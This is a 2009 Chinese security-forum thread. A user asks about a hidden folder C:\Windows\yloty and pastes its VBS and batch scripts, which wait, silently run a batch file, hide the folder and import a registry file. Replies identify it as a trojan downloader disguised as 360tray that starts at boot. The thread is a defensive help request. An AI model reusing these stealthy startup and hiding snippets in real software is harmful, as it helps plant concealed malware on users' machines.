微点交流论坛

标题: C:\Windows\yloty 是什么？ [打印本页]

作者: 111lg 时间: 2009-9-26 08:44 标题: C:\Windows\yloty 是什么？

在C:\Windows\yloty下的隐藏目录。咨询下这是是什么！

文件无法上传。贴上内容

1.vbs
wscript.sleep 108000
on error resume next
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c C:\WINDOWS\yloty\2.bat",vbhide

2.bat
@echo off
attrib a s h C:\WINDOWS\yloty
regedit /s 12.reg
exit

12.reg

作者: 405016 时间: 2009-9-26 09:10
360论坛也有这个问题http://help.360.cn/5030806/26440832.html

作者: Legend 时间: 2009-9-26 09:14
从楼主所提供的信息，并不清楚这些程序的真正目的是什么？
可能是往注册表增加一个项，具体是什么得看12.reg。
建议删除了。

作者: 坐照 时间: 2009-9-26 12:47
这样偷偷摸摸的，肯定有问题。

作者: 111lg 时间: 2009-9-26 20:37

Quote:

Originally posted by Legend at 2009-9-26 09:14:
从楼主所提供的信息，并不清楚这些程序的真正目的是什么？
可能是往注册表增加一个项，具体是什么得看12.reg。
建议删除了。

我已经移除了，感觉机器快一点了，压缩了文件夹上传不来。

作者: peak_king 时间: 2009-9-26 22:40
这个东西我都碰过两次了那个reg里面是把某个貌似是spoolv。vbe伪装成360tray
开机自启动
然后vbe里面是运行1.bat 2.bat 等等很多循环最关键的一个bat 还是加密的是从某个网站上下文件一般是木马我记得是8888.exe
下载完删除bat
就是这样

作者: 111lg 时间: 2009-9-27 20:14

Quote:

Originally posted by peak_king at 2009-9-26 22:40:
这个东西我都碰过两次了那个reg里面是把某个貌似是spoolv。vbe伪装成360tray
开机自启动
然后vbe里面是运行1.bat 2.bat 等等很多循环最关键的一个bat 还是加密的是从某个网站上下文件一般是木马我记得是88 ...

O(∩_∩)O谢谢告知

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn